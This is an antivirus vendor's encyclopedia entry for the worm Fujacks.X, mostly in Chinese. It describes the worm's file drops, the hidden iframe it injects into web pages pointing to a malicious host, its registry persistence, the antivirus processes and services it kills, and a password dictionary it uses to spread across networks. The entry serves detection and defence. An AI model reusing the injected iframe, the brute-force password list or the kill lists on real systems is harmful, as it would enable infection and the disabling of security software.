Need help? Ask the community or hire an expert.
Go to Avira Answers
病毒:Worm/Fujacks.X
发现日期:13/12/2012
类型:蠕虫
广泛传播:
病毒传播个案呈报:低程度
感染/传播能力:中等程度
破坏 / 损害程度:中等程度
静态文件:
文件大小:118.272 字节
MD5 校检和:9d0Ceb2ef643a2f326dfcd8265502ce9
VDF 版本:7.11.53.216 - 13 Aralık 2012 Perşembe
IVDF 版本:7.11.53.216 - 13 Aralık 2012 Perşembe

 况概描述 传播方法:
   • 局域网络
   • 网络驱动器映射


别名:
   •  Mcafee: W32/Fujacks.h
   •  Kaspersky: Worm.Win32.Fujack.a
   •  F-Secure: Worm.Win32.Fujack.a
   •  Sophos: W32/Fujacks-AJ
   •  Panda: W32/Radoppan.I.drp
   •  Grisoft: Worm/Generic.ANX
   •  Eset: Win32/Fujacks
   •  Bitdefender: Win32.Worm.Fujacks.X


平台/操作系统:
   • Windows 95
   • Windows 98
   • Windows 98 SE
   • Windows NT
   • Windows ME
   • Windows 2000
   • Windows XP
   • Windows 2003


副作用:
   • 关闭安全应用程序
   • 下载文件
   • 植入文件
   • 降低系统安全设置
   • 注册表修改

 文件 它将本身复制到以下位置:
   • %SYSDIR%\drivers\CTFMONT.exe
   • %驱动器%\setup.exe



部分内容会被添加入文件。
– 收件人: %所有目录%\*.htm 具有以下内容:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– 收件人: %所有目录%\*.html 具有以下内容:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– 收件人: %所有目录%\*.asp 具有以下内容:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– 收件人: %所有目录%\*.php 具有以下内容:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– 收件人: %所有目录%\*.jsp 具有以下内容:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– 收件人: %所有目录%\*.asp 具有以下内容:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe




创建以下文件:

– 非恶意文件:
   • %SYSDIR%\SVKP.sys

%所有目录%\Desktop_.ini 这是一个无恶意的文本文件,包含以下内容:
   • %当前日期%

%驱动器%\autorun.inf 这是一个无恶意的文本文件,包含以下内容:
   • %运行恶意软件代码%




它会尝试下载文件:

– 该位置如下所示:
   • http://www.ctv163.com/**********/down.txt
此文件可能包含更多下载位置,并且可能成为新威胁的来源。

 注册表 会在无限循环中连续添加以下注册表项,以便在系统重新引导之后运行进程。

–  [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   • svcshare = %SYSDIR%\drivers\CTMONTv.exe



会删除以下注册表项的注册值:

–  [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   • RavTask
   • KvMonXP
   • kav
   • KAVPersonal50
   • McAfeeUpdaterUI
   • Network Associates Error Reporting Service
   • ShStatEXE
   • YLive.exe
   • yassistse



会更改以下注册表项:

各种 Explorer 设置:
– [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
   Folder\Hidden\SHOWALL]
   旧值:
   • CheckedValue = %用户定义的设置%
   新值:
   • CheckedValue = 0

 网络感染 该恶意软件会尝试以下方式连接其他计算机来作广泛传播/感染。


它使用以下登录信息来访问远程计算机:

– 以下用户名列表:
   • Administrator
   • Guest
   • admin
   • Root

– 以下密码列表:
   • 1234; password; 6969; harley; 123456; golf; pussy; mustang; 1111;
      shadow; 1313; fish; 5150; 7777; qwerty; baseball; 2112; letmein;
      12345678; 12345; ccc; admin; 5201314; qq520; 123; 1234567; 123456789;
      654321; 54321; 111; 000000; abc; 11111111; 88888888; pass; passwd;
      database; abcd; abc123; sybase; 123qwe; server; computer; 520; super;
      123asd; ihavenopass; godblessyou; enable; 2002; 2003; 2600; alpha;
      110; 111111; 121212; 123123; 1234qwer; 123abc; 007; aaa; patrick; pat;
      administrator; root; sex; god; fuckyou; fuck; test; test123; temp;
      temp123; win; asdf; pwd; qwer; yxcv; zxcv; home; xxx; owner; login;
      Login; pw123; love; mypc; mypc123; admin123; mypass; mypass123; 901100



IP 地址生成:
它会创建随机 IP 地址,但会保留自己地址的前三个八位位组。 之后,它会尝试与所创建的地址建立连接。


感染进程:
下载的文件会按以下形式存储在受影响的计算机上: %所有共享文件夹%\GameSetup.exe


运行速度减缓:
– 它会创建以下的感染线程: 10
– 根据您的带宽,您可能会注意到网络速度有所降低。 由于此恶意软件的网络活动不是很多,如果您使用的是宽带连接,可能不会注意到。
– 由于创建了多个网络线程,您可能还会注意到网速稍为变慢。

 进程终止 被终止进程列表:
   • Mcshield.exe; VsTskMgr.exe; naPrdMgr.exe; UpdaterUI.exe; TBMon.exe;
      scan32.exe; Ravmond.exe; CCenter.exe; RavTask.exe; Rav.exe;
      Ravmon.exe; RavmonD.exe; RavStub.exe; KVXP.kxp; KvMonXP.kxp;
      KVCenter.kxp; KVSrvXP.exe; KRegEx.exe; UIHost.exe; TrojDie.kxp;
      FrogAgent.exe; Logo1_.exe; Logo_1.exe; Rundl132.exe

会终止包含以下某个窗口标题的进程:
   • Symantec AntiVirus
   • Duba
   • Windows
   • esteem procs
   • System Safety Monitor
   • Wrapped gift Killer
   • Winsock Expert


关闭的服务列表:
   • sharedaccess; RsCCenter; RsRavMon; RsCCenter; RsRavMon; KVWSC;
      KVSrvXP; KVWSC; KVSrvXP; AVP; kavsvc; McAfeeFramework; McShield;
      McTaskManager; McAfeeFramework; McShield; McTaskManager; navapsvc;
      wscsvc; KPfwSvc; SNDSrvc; ccProxy; ccEvtMgr; ccSetMgr; SPBBCSvc;
      Symantec Core LC; NPFMntor; MskService; FireSvc

 其他 防调试
它会检查是否存在以下某个文件:
   • \\.\TRW
   • \\.\SICE
   • \\.\NTICE
   • \\.\FILEVXD
   • \\.\FILEMON
   • \\.\REGVXD
   • \\.\REGMON

如果成功执行,它会显示以下消息并立即终止:


 文件详细信息 编程语言:
该恶意软件程序是用 Delphi 编写的。


运行时压缩程序:
为了提高检测难度以及减小文件,它已使用以下运行时压缩程序进行压缩:
   • SVKP

Açıklamayı yerleştiren Andrei Gherman tarihinde 18 Ekim 2007 Perşembe
Açıklamayı güncelleyen: Andrei Gherman tarihinde 18 Ekim 2007 Perşembe

Geri . . . .
https:// Bu pencere güvenlik amacıyla şifrelenmiştir.